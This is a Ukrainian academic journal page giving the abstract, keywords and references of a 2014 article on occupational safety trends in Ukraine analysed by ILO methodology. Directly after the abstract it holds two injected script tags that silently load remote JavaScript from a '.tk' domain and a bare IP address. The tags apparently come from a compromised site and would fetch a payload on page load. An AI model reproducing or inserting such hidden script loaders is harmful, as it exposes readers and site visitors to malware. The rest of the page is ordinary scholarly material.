ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 331.456:331.46:331.47
Проблеми економічної теорії

Аналіз стану безпеки праці в Україні за методологією МОП / Спасенко Ю. О. // Економіка АПК. - 2014. - № 5 - С. 77

Здійснено аналіз нормативно-правової бази щодо забезпечення безпеки праці в Україні згідно з останніми змінами у законодавстві та відповідно до норм ЄС. Досліджено стан і динаміку соціально-економічних показників безпеки праці в Україні за методологією МОП. Простежено позитивні й негативні тенденції у сфері безпеки та гігієни праці впродовж 2002–2012 років. Зазначено про істотне зростання розмірів виплат потерпілим на виробництві та удосконалений порядок розслідування нещасних випадків і професійних захворювань на виробництві. Виявлено, що багато роботодавців ухиляються від дотримання норм та законів щодо охорони праці, а значна частина нещасних випадків приховується. Для поліпшення ситуації необхідне впровадження прогресивних технологій, систем контролю та оповіщення, удосконалення вимог до системи підготовки й підвищення кваліфікації кад-рів із питань охорони праці. Табл.: 1. Бібліогр.: 15.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: гідна праця, безпека та гігієна праці, умови праці, виробничий травматизм, нещасні випадки на виробництві, професійні захворювання, страхові виплати, профілактика

Список використаних джерел

 1. Закон України „Про охорону праці” від 14.10.1992 № 2694-XII [Електронний ресурс]. – Режим доступу : http://zakon4.rada.gov.ua/laws/show/2694-12/page2.
 2. Закон України „Про загальнообов’язкове державне соціальне страхування від нещасного випадку на виробництві та професійного захворювання, які спричинили втрату працездатності” від 23.09.1999 року № 1105-XIV [Електронний ресурс]. – Режим доступу : http://zakon4.rada.gov.ua/laws/show/1105-14/page3.
 3. Закон України „Про Загальнодержавну програму адаптації законодавства України до законодавства Європейського Союзу” від 18.03.2004 р. № 1629-IV [Електронний ресурс]. – Режим доступу : http://zakon4.rada.gov.ua/laws/show/1629-15.
 4. Закон України „Про затвердження Загальнодержавної соціальної програми поліпшення стану безпеки, гігієни праці та виробничого середовища на 2014–2018 роки” від 04.04.2013 № 178-VII [Електронний ресурс]. – Режим доступу : http://zakon4.rada.gov.ua/laws/show/178-18.
 5. Постанова КМУ від 30.11.2011 р. № 1232 „Деякі питання розслідування та обліку нещасних випадків, професійних захворювань і аварій на виробництві” [Електронний ресурс]. – Режим доступу : http://zakon2.rada.gov.ua/laws/show/1232-2011-п.
 6. Аналіз страхових нещасних випадків на виробництві та профзахворювань за 2012 р. – Фонд соціального страхування від нещасних випадків на виробництві та професійних захворювань України [Електронний ресурс]. – Режим доступу : http://www.social.org.ua/view/3015.
 7. Безпека праці на виробництві, запобігання професійним захворюванням – це виклик часу [Електронний ресурс]. – Режим доступу : http://www.fpsu.org.ua.
 8. Національна доповідь про стан техногенної та природної безпеки в Україні у 2012 році. [Електронний ресурс]. – Режим доступу : http://www.mns.gov.ua/content/nasdopovid2012.html.
 9. Національне дослідження з питань реєстрації нещасних випадків на виробництві та професійних захворювань та повідомлення про них: Україна. – МОП, 2012 [Електронний ресурс]. – Режим доступу : http://www.ilo.org/wcmsp5/groups/public/–ed_protect/–protrav/–safework/documents/publication/wcms_208295.pdf.
 10. Профіль гідної праці в Україні ; за ред. В.В. Івашкевича. – Генерального директора Інституту розвитку соціального страхування та кредитування. – МОП, 2011 [Електронний ресурс]. – Режим доступу : http://www.ilo.org/wcmsp5/groups/public/–dgreports/–integration/documents/publication/wcms_154571.pdf.
 11. Статистичний щорічник України за 2002 – 2012 рр. / Державна служба статистики України ; за ред. О. Г. Осауленка. – К. : ТОВ „Август Трейд”, 2003 – 2013.
 12. Стат. зб. Праця України за 2002 – 2012 рр., / Державна служба статистики України ; відп. за вип. І.В. Сеник. – К. : ТОВ „Август Трейд”, 2003 – 2013.
 13. Статистична звітність ФССНВ за 2002 – 2012 рр. [Електронний ресурс]. – Режим доступу : http://www.social.org.ua/view/3015.
 14. Дані Виконавчої дирекції ФССНВ за 2002 – 2012 рр.
 15. Decent work country profile: Ukraine / International Labour Office, ILO/EC Project “Monitoring and Assessing Progress on Decent Work” (MAP). – Geneva: ILO, 2013 [Електронний ресурс]. – Режим доступу : http://www.ilo.org/wcmsp5/groups/public/–dgreports/–integration/documents/publication/wcms_221717.pdf.
Читати статтю: 14_05_77-84.pdf